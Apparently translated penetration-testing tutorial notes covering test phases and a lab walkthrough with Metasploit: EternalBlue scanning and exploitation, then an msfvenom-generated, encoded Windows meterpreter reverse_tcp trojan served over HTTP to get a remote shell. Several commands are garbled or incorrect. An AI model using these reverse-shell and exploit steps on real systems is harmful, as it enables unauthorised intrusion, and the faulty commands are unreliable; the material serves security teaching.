# 1. Phase division:
Vulnerability exploitation is divided into the stages of early interaction, intelligence collection, threat modeling, vulnerability analysis, penetration and exploitation, and post-exploitation and exploitation report.
## 1. Early stage of interaction:
Interactive discussions with client organizations to determine scope, goals, etc.
This stage can be understood as the stage before intelligence collection, mainly to find the target confirmation range
## 2. Intelligence gathering stage:
For more target organization information:
| Peripheral Information Search - Google
Host detection and port scanning such as -Nmap
Service scanning Use the service scanning module in auxiliary/scanner/ in metasploit to scan the service version and other information in the target machine
Network Vulnerability Scanning - OpenVAS, Nessus, etc.
Other tools scan py script scan
## 3. Threat modeling phase:
Sort out the clues and determine the most feasible exploit channel. The documents written in this modeling stage are not for yourself but for the whole team to facilitate multi-person cooperation
This stage is mainly to sort out the collected information and clarify the idea of exploiting the vulnerability.
## 4. Vulnerability analysis stage:
Search for available exploit code resources
This stage mainly selects and matches possible exploit modules, shellcode
## 5. Penetration stage:
Find security holes, hack into the system
At this stage, try to exploit the vulnerability, configure monitoring, and start exploiting the vulnerability
## 6. Post-exploitation stage:
Meterpreter, implement operations
At this stage, the relevant data download backdoor maintenance, privilege escalation and other operations will be implemented
## 7. Report phase:
Exploitation Penetration Test Report
This stage is mainly to summarize the penetration. The overview generally includes time, personnel, scope of vulnerability exploitation, technical means and so on. In this part, we need to determine the time frame for exploiting the exploit, the personnel and contact information involved in exploiting the exploit, the agreed scope of exploiting the exploit, and descriptions of techniques and tools used in the exploiting process. Clearly write the early interaction, intelligence collection, threat modeling, vulnerability analysis, penetration and exploitation, post-penetration and exploitation, vulnerability exploitation results, security recommendations, etc.
In the process of writing, special attention should be paid to: the description of the vulnerability should not be too simple, and it should be mentioned in one stroke; in the security suggestion section, avoid putting forward security suggestions that have no practical significance, such as strengthening security awareness; the report structure is chaotic, and there are too many complicated technical terms , such as around the dog, x station, etc.;
# 2. Actual operation (example)
Host range and target identified
1 Intelligence gathering
Discover surviving hosts on the intranet based on msf
search search
Enter search scanner type:auxiliary in the msf terminal
Modules that can be used to discover hosts
auxiliary/scanner/discovery/arp_sweep # Discover surviving hosts on the intranet based on ARP
auxiliary/scanner/discovery/udp_sweep # Discover surviving hosts on the intranet based on UDP
auxiliary/scanner/ftp/ftp_version # Discover FTP service
auxiliary/scanner/http/http_version # Discover HTTP service
auxiliary/scanner/smb/smb_version # Discover surviving hosts in the intranet based on smb
Discover surviving hosts on the intranet based on netbios
Discover surviving hosts on the intranet based on snmap
Discover surviving hosts on the intranet based on ICMP
2 Threat Modeling
---
After the first step of intelligence collection, we discovered the target machine ip through arp
Then by scanning the ip of the target machine, we know that the target machine has opened port 80, has web services, and opened ftp ports, which has file services
open smb
Finally decided to exploit smb-related vulnerabilities
The alternative is exploited by implanting a Trojan horse
---
3 Vulnerability analysis
The first step is to check the smb exploit vulnerabilities, such as Eternal Blue
1 Query the modules related to msf and Eternal Blue
Use the command search ms17_010
2 Then we took advantage of an Eternal Blue scanning module
use auxiliary/scanner/smb/smb_ms17_010
3 Enter options to view the parameters that the scanning module needs to configure
3.1 Then we configured rhost (rhost refers to the target host ip)
ip roast set
4 Then we perform scan input run
Potentially vulnerable hosts discovered
4 Penetration
---
1 Load the EternalBlue exploit module
use exploit/windows/smb/ms17_010_eternalblue
2 Enter options to view the parameters that the scanning module needs to configure
3.1 Then we configured rhost (rhost refers to the target host ip)
ip roast set
3.2 Then we configured lhost (lhost refers to the monitoring host or attacking machine ip)
set lhost ip
3.3 Then we configured lport (referring to the monitored port)
set lport ip
Note that the port must not be occupied
4 Then we execute the scan input run to execute the EternalBlue exploit
But the discovery failed, indicating that the module has been used but did not return the corresponding session
![image.png](10-11 msfconsole exploit process.assets/bffdb79061ad4b0aa92d2dfde83e9f1b.png)
5 Alternatives are exploited by implanting Trojan horses
---
1 We know that the target machine is a win system, so use msfvenom to generate a win platform Trojan horse
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.3.33 LPORT=4446 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 10 -f exe -o payload.exe
2 After the vulnerability is generated, upload the Trojan to the target machine by starting a py service
python -m SimpleHTTPServer 80
3 To configure the monitoring program we use
use exploit/multi/handler
3 Enter options to enter the configuration
3.1 Then we configured lhost (lhost refers to the monitoring host or attacking machine ip)
set lhost ip
3.2 Then we configured lport (referring to the monitored port)
set lport ip
Note that the port must be the same as the Trojan port generated by msfvenom
4 Configure the attack load payload
set payload windows/meterpreter/reverse_tcp
5 Execute the exploit and wait for the target machine to execute the Trojan horse
6 The target machine executes the Trojan horse
exploit success and get meterpreter
---
5 Post-exploitation
go to new document
6 Reporting phases